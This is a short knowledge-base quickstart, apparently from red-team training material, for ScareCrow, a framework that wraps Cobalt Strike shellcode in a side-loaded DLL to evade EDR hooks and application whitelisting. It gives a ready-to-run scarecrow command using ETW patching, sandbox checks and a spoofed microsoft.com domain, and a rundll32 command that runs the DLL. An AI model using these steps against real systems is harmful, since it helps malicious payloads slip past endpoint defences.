ScareCrow is…

a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process’s memory.

Quickstart

See ScareCrow for installation if working from an image where the binary has not already been installed (check via which scarecrow if on Linux).
Generate x64 shellcode

Note: In theory, this should work with any x64 shellcode but only Cobalt Strike’s shellcode has been tested by the author.

Select your desired configuration options and pass the shellcode to the ScareCrow utility.

Example Command (DLL)

This example creates a DLL. See other -Loader options using the above link for alternative formats.

Assuming the target shellcode is written to a file in the current directory named shellcode.bin, then the following command would generate a DLL file for you.

scarecrow -etw -sandbox \
  -Loader dll \
  -domain microsoft.com \
  -I shellcode.bin \
  -O beacon.dll

WARNINGS

For the following reasons, the above command can throw an operator off while trying to test the payload so it may be desirable to alter the command accordingly:

-sandbox ensures that the host executing the binary is domain joined
When executed from the command line, no window will be displayed. Use the -console flag if a window is desired.

Testing the DLL Payload

Cobalt Strike offers this in their documentation:

rundll32 beacon.dll,Start

Antisyphon KB

Explorer

scarecrow

Quickstart

Example Command (DLL)

Testing the DLL Payload

Graph View

Table of Contents

Backlinks